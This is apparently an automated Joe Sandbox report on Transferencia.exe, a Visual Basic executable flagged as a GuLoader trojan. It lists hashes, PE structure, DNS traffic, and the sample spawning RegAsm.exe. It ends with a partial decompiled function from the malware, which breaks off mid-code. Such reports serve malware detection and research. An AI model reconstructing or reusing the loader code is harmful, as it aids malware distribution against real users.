Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@4/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 98.6% (good quality ratio 66.2%) Quality average: 39.4% Quality standard deviation: 38.2%
HCA Information:	Successful, ratio: 73% Number of executed functions: 115 Number of non-executed functions: 17
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.42.151.234, 13.64.90.137, 13.88.21.125, 20.82.210.154, 23.10.249.26, 23.10.249.43, 40.88.32.150, 104.43.193.48, 168.61.161.212, 23.0.174.185, 23.0.174.200, 20.82.209.183, 172.217.168.14, 20.54.26.129, 23.54.113.53 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:13:39	API Interceptor	103x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.7314228952467845
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Transferencia.exe
File size:	122880
MD5:	7c22c3e3b8726dd1b03e69c203590026
SHA1:	7715be6b73e52535d81b083a3dfd95568a729782
SHA256:	96fb89fdc3873864981ec26c355111c26c7ab5132770ead9d1d97bdfac32e566
SHA512:	bea857c957f771e3b7c24a3e9770da90766f3c8bf2af74fa79a7b2e9a372b55a1fe628dd72f0744ac1e99d63527e72092dfc47bc2e9b09e2c84030e25f519625
SSDEEP:	1536:yGouBnMJDe1Rd/tnt+5vAQlhI2k1c8VtK9ihGo:yGZBn5j+3I2gtVtK9ihG
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L....{.O.................p...`......(.............@................

File Icon


Icon Hash:	0ccea09899191898

Static PE Info

General
Entrypoint:	0x401328
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4F8F7B90 [Thu Apr 19 02:42:24 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	efa774b90ad6b9ab8c4fabb031ebe78d

Entrypoint Preview

Instruction
push 00413E10h
call 00007F48ACE91015h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jl 00007F48ACE91014h
fisub dword ptr [edi]
mov bh, 3Fh
sti
inc eax
or dword ptr [edi-6Fh], 17349181h
push esi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc ecx
add byte ptr [esi+53018250h], al
push 7372656Fh
aaa
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
sub bl, dl
aam 67h
dec esi
add dword ptr [ebp-6Ah], DE15A246h
inc dword ptr [edx]
sal byte ptr [ebx-5D2637B1h], 00000045h
push ecx
jc 00007F48ACE90FFAh
dec ebp
sahf
pop ds
in al, dx
dec ebx
inc esi
push esp
mov word ptr [edi+33AD4F3Ah], seg?
cdq
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov ebp, D8000129h
inc esp
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [ecx+eax*2+53h], cl
push esp
inc ebp
push eax
inc ecx
dec esp
dec esp
add byte ptr [62000701h], cl
insb
jo 00007F48ACE9108Bh
popad
jc 00007F48ACE91022h
sbb dword ptr [ecx], eax
add byte ptr [edx+00h], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17614	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x4856	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xd4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16a04	0x17000	False	0.347465183424	data	6.19151280258	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x18000	0xa88	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x19000	0x4856	0x5000	False	0.4142578125	data	4.36602718987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1b2ae	0x25a8	data
RT_ICON	0x1a206	0x10a8	data
RT_ICON	0x1987e	0x988	data
RT_ICON	0x19416	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x193d8	0x3e	data
RT_VERSION	0x19180	0x258	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaVarForInit, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, __vbaVarForNext, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	YCIETRA
FileVersion	3.00
CompanyName	Salty
Comments	Salty
ProductName	Salty
ProductVersion	3.00
FileDescription	Salty
OriginalFilename	YCIETRA.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 21:11:55.768042088 CEST	54531	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:11:55.780359983 CEST	53	54531	8.8.8.8	192.168.2.4
Apr 8, 2021 21:11:55.883462906 CEST	49714	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:11:55.898070097 CEST	53	49714	8.8.8.8	192.168.2.4
Apr 8, 2021 21:11:58.097877979 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:11:58.110531092 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 8, 2021 21:11:59.033427000 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:11:59.048686028 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 8, 2021 21:11:59.959151983 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:11:59.971601009 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:01.150670052 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:01.163203001 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:02.185863972 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:02.198513985 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:03.113531113 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:03.126367092 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:04.205010891 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:04.218501091 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:05.546283960 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:05.560033083 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:09.546550989 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:09.559048891 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:10.521244049 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:10.534894943 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:24.931571960 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:24.944093943 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:27.205535889 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:27.225574970 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:42.319421053 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:42.332051992 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:42.969063044 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:42.981756926 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:43.728193045 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:43.741270065 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:44.649430990 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:44.663150072 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:46.299026012 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:46.312469959 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:46.953691006 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:46.966485023 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:50.850680113 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:50.865803003 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:50.899362087 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:50.917721987 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:51.834000111 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:51.847381115 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 8, 2021 21:12:59.857206106 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:12:59.871678114 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 8, 2021 21:13:03.895875931 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:13:03.914320946 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 8, 2021 21:13:34.054303885 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:13:34.067322016 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 8, 2021 21:13:39.253865957 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:13:39.280627966 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 8, 2021 21:13:42.108520985 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:13:42.135521889 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 8, 2021 21:13:43.186271906 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 8, 2021 21:13:43.204425097 CEST	53	60875	8.8.8.8	192.168.2.4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Transferencia.exe PID: 6804 Parent PID: 1280

General

Start time:	21:12:03
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\Transferencia.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Transferencia.exe'
Imagebase:	0x400000
File size:	122880 bytes
MD5 hash:	7C22C3E3B8726DD1B03E69C203590026
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 7052 Parent PID: 6804

General

Start time:	21:13:30
Start date:	08/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\Transferencia.exe'
Imagebase:	0x400000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 7080 Parent PID: 6804

General

Start time:	21:13:30
Start date:	08/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Transferencia.exe'
Imagebase:	0xfa0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7096 Parent PID: 7080

General

Start time:	21:13:31
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Transferencia.exe PID: 6804 Parent PID: 1280 Transferencia.exeCOMMON

Execution Graph

Execution Coverage:	13.7%
Dynamic/Decrypted Code Coverage:	8.6%
Signature Coverage:	0%
Total number of Nodes:	139
Total number of Limit Nodes:	16

Executed Functions

Function 00416164, Relevance: 151.4, APIs: 82, Strings: 4, Instructions: 924
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00416164(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				char _v96;
				char _v100;
				signed int _v104;
				char _v108;
				intOrPtr _v116;
				char _v124;
				signed int _v132;
				char _v140;
				signed int _v148;
				char _v156;
				signed int _v164;
				char _v172;
				short _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				signed int _v196;
				signed int _v200;
				void* _v204;
				signed int _v208;
				signed int _v212;
				char _v228;
				char _v244;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				intOrPtr* _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				intOrPtr* _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				signed int _v352;
				intOrPtr* _v356;
				signed int _v360;
				signed int _v364;
				intOrPtr* _v368;
				intOrPtr* _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				char _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				intOrPtr* _v404;
				short _v408;
				char _v412;
				signed int _v416;
				signed int _t483;
				signed int _t489;
				signed int _t494;
				signed int* _t495;
				signed int _t500;
				signed int _t506;
				signed int _t512;
				char* _t514;
				signed int _t517;
				signed int _t523;
				signed int _t526;
				intOrPtr _t531;
				signed int _t535;
				char* _t539;
				signed int _t540;
				char* _t546;
				signed int _t550;
				signed int _t554;
				signed int* _t558;
				signed int _t562;
				signed int _t572;
				signed int _t581;
				signed int _t586;
				signed int _t595;
				signed int _t599;
				signed int _t603;
				signed int _t610;
				signed int _t614;
				signed int* _t618;
				signed int _t625;
				char* _t630;
				void* _t631;
				char* _t637;
				signed int _t643;
				signed int _t647;
				signed int* _t648;
				signed int _t651;
				signed int _t656;
				char* _t669;
				char* _t676;
				signed int* _t679;
				void* _t714;
				void* _t716;
				intOrPtr _t717;
				void* _t718;
				void* _t719;
				void* _t742;

				_t717 = _t716 - 0x18;
				 *[fs:0x0] = _t717;
				L004011F0();
				_v28 = _t717;
				_v24 = E004010D8;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t714);
				_v8 = 1;
				_v8 = 2;
				L0040130A();
				_v8 = 3;
				_t483 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 0xffffffff);
				asm("fclex");
				_v196 = _t483;
				if(_v196 >= 0) {
					_v284 = _v284 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4141b0);
					_push(_a4);
					_push(_v196);
					L00401304();
					_v284 = _t483;
				}
				_v8 = 4;
				if( *0x41831c != 0) {
					_v288 = 0x41831c;
				} else {
					_push(0x41831c);
					_push(0x414720);
					L004012FE();
					_v288 = 0x41831c;
				}
				_v196 =  *_v288;
				_t489 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v100);
				asm("fclex");
				_v200 = _t489;
				if(_v200 >= 0) {
					_v292 = _v292 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x414710);
					_push(_v196);
					_push(_v200);
					L00401304();
					_v292 = _t489;
				}
				_v204 = _v100;
				_t494 =  *((intOrPtr*)( *_v204 + 0x100))(_v204,  &_v180);
				asm("fclex");
				_v208 = _t494;
				if(_v208 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x414730);
					_push(_v204);
					_push(_v208);
					L00401304();
					_v296 = _t494;
				}
				_t495 =  &_v88;
				L004012F8();
				E00414528(); // executed
				_v184 = _t495;
				L004012F2();
				_v80 = _v184;
				L004012EC();
				L004012E6();
				_v8 = 5;
				_v8 = 7;
				_t500 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v180, _v180, _t495, _t495, L"c:\\windows\\logow.sys", 0, 0x140, 0xc8, 0x10);
				asm("fclex");
				_v196 = _t500;
				if(_v196 >= 0) {
					_v300 = _v300 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4141b0);
					_push(_a4);
					_push(_v196);
					L00401304();
					_v300 = _t500;
				}
				_push(_v180);
				E004145B8();
				L004012F2();
				_v8 = 8;
				E00414610();
				L004012F2();
				_v8 = 9;
				_push(_v80);
				_push(2);
				E0041465C();
				L004012F2();
				_v8 = 0xa;
				_push(2);
				E004146B0();
				_v180 = _t500;
				L004012F2();
				_v8 = 0xc;
				E00414570();
				L004012F2();
				_v8 = 0xd;
				if( *0x41831c != 0) {
					_v304 = 0x41831c;
				} else {
					_push(0x41831c);
					_push(0x414720);
					L004012FE();
					_v304 = 0x41831c;
				}
				_v196 =  *_v304;
				_t506 =  *((intOrPtr*)( *_v196 + 0x1c))(_v196,  &_v100);
				asm("fclex");
				_v200 = _t506;
				if(_v200 >= 0) {
					_v308 = _v308 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x414710);
					_push(_v196);
					_push(_v200);
					L00401304();
					_v308 = _t506;
				}
				_v204 = _v100;
				_v132 = 2;
				_v140 = 3;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t512 =  *((intOrPtr*)( *_v204 + 0x54))(_v204, 0x10,  &_v104);
				asm("fclex");
				_v208 = _t512;
				if(_v208 >= 0) {
					_v312 = _v312 & 0x00000000;
				} else {
					_push(0x54);
					_push(0x414770);
					_push(_v204);
					_push(_v208);
					L00401304();
					_v312 = _t512;
				}
				_v268 = _v104;
				_v104 = _v104 & 0x00000000;
				_t514 =  &_v108;
				L004012E0();
				_t517 =  *((intOrPtr*)( *_a4 + 0x154))(_a4, _t514, _t514, _v268);
				asm("fclex");
				_v212 = _t517;
				if(_v212 >= 0) {
					_v316 = _v316 & 0x00000000;
				} else {
					_push(0x154);
					_push(0x4141b0);
					_push(_a4);
					_push(_v212);
					L00401304();
					_v316 = _t517;
				}
				_push( &_v108);
				_push( &_v100);
				_push(2);
				L004012DA();
				_t718 = _t717 + 0xc;
				_v8 = 0xe;
				if( *0x418010 != 0) {
					_v320 = 0x418010;
				} else {
					_push(0x418010);
					_push(0x414948);
					L004012FE();
					_v320 = 0x418010;
				}
				_t523 =  &_v100;
				L004012E0();
				_v196 = _t523;
				_t526 =  *((intOrPtr*)( *_v196 + 0x1f8))(_v196, _t523,  *((intOrPtr*)( *((intOrPtr*)( *_v320)) + 0x380))( *_v320));
				asm("fclex");
				_v200 = _t526;
				if(_v200 >= 0) {
					_v324 = _v324 & 0x00000000;
				} else {
					_push(0x1f8);
					_push(0x414780);
					_push(_v196);
					_push(_v200);
					L00401304();
					_v324 = _t526;
				}
				L004012E6();
				_v8 = 0xf;
				_v132 = L"greenfield";
				_v140 = 8;
				_v192 = 0x3b1d5c60;
				_v188 = 0x5af4;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t531 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v192, 0x10);
				_v8 = 0x10;
				L004012D4();
				_v60 = _t531;
				_v8 = 0x11;
				_t535 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v192);
				_v196 = _t535;
				if(_v196 >= 0) {
					_v328 = _v328 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x4141e0);
					_push(_a4);
					_push(_v196);
					L00401304();
					_v328 = _t535;
				}
				_v76 = _v192;
				_v72 = _v188;
				_v8 = 0x12;
				_push(0xb);
				_push(0xb);
				_push(0x7db);
				_push( &_v124);
				L004012C8();
				_t539 =  &_v124;
				_push(_t539);
				L004012CE();
				_v196 =  ~(0 | _t539 != 0x0000ffff);
				_t669 =  &_v124;
				L004012C2();
				_t540 = _v196;
				if(_t540 != 0) {
					_v8 = 0x13;
					L004012BC();
					_t656 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t540);
					asm("fclex");
					_v196 = _t656;
					if(_v196 >= 0) {
						_v332 = _v332 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x4141b0);
						_push(_a4);
						_push(_v196);
						L00401304();
						_v332 = _t656;
					}
				}
				_v8 = 0x15;
				_v132 = 1;
				_v140 = 2;
				_v148 = 0x1c977;
				_v156 = 3;
				_v164 = _v164 & 0x00000000;
				_v172 = 2;
				_push( &_v140);
				_push( &_v156);
				_push( &_v172);
				_push( &_v244);
				_push( &_v228);
				_t546 =  &_v52;
				_push(_t546);
				L004012B6();
				_v272 = _t546;
				while(_v272 != 0) {
					_v8 = 0x16;
					if( *0x418010 != 0) {
						_v336 = 0x418010;
					} else {
						_push(0x418010);
						_push(0x414948);
						L004012FE();
						_v336 = 0x418010;
					}
					_t550 =  &_v100;
					L004012E0();
					_v196 = _t550;
					_t554 =  *((intOrPtr*)( *_v196 + 0x48))(_v196,  &_v88, _t550,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x330))( *_v336));
					asm("fclex");
					_v200 = _t554;
					if(_v200 >= 0) {
						_v340 = _v340 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4145e8);
						_push(_v196);
						_push(_v200);
						L00401304();
						_v340 = _t554;
					}
					if( *0x418010 != 0) {
						_v344 = 0x418010;
					} else {
						_push(0x418010);
						_push(0x414948);
						L004012FE();
						_v344 = 0x418010;
					}
					_t558 =  &_v104;
					L004012E0();
					_v204 = _t558;
					_t562 =  *((intOrPtr*)( *_v204 + 0xc8))(_v204,  &_v92, _t558,  *((intOrPtr*)( *((intOrPtr*)( *_v344)) + 0x344))( *_v344));
					asm("fclex");
					_v208 = _t562;
					if(_v208 >= 0) {
						_v348 = _v348 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x4147ac);
						_push(_v204);
						_push(_v208);
						L00401304();
						_v348 = _t562;
					}
					_v276 = _v92;
					_v92 = _v92 & 0x00000000;
					_t676 =  &_v96;
					L004012B0();
					_v280 = _v88;
					_v88 = _v88 & 0x00000000;
					_v116 = _v280;
					_v124 = 8;
					_v132 = 0x3b7931;
					_v140 = 3;
					_v296 =  *0x401180;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t572 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x10,  &_v124, _t676, _t676,  &_v96,  &_v176);
					_v212 = _t572;
					if(_v212 >= 0) {
						_v352 = _v352 & 0x00000000;
					} else {
						_push(0x6fc);
						_push(0x4141e0);
						_push(_a4);
						_push(_v212);
						L00401304();
						_v352 = _t572;
					}
					_v84 = _v176;
					L004012EC();
					_push( &_v104);
					_push( &_v100);
					_push(2);
					L004012DA();
					_t719 = _t718 + 0xc;
					L004012C2();
					_v8 = 0x17;
					if( *0x41831c != 0) {
						_v356 = 0x41831c;
					} else {
						_push(0x41831c);
						_push(0x414720);
						L004012FE();
						_v356 = 0x41831c;
					}
					_v196 =  *_v356;
					_t581 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v100);
					asm("fclex");
					_v200 = _t581;
					if(_v200 >= 0) {
						_v360 = _v360 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x414710);
						_push(_v196);
						_push(_v200);
						L00401304();
						_v360 = _t581;
					}
					_v204 = _v100;
					_t586 =  *((intOrPtr*)( *_v204 + 0x128))(_v204,  &_v180);
					asm("fclex");
					_v208 = _t586;
					if(_v208 >= 0) {
						_v364 = _v364 & 0x00000000;
					} else {
						_push(0x128);
						_push(0x414730);
						_push(_v204);
						_push(_v208);
						L00401304();
						_v364 = _t586;
					}
					_v212 =  ~(0 | _v180 == 0x00000000);
					_t679 =  &_v100;
					L004012E6();
					if(_v212 != 0) {
						_v8 = 0x18;
						_v8 = 0x19;
						if( *0x41831c != 0) {
							_v368 = 0x41831c;
						} else {
							_push(0x41831c);
							_push(0x414720);
							L004012FE();
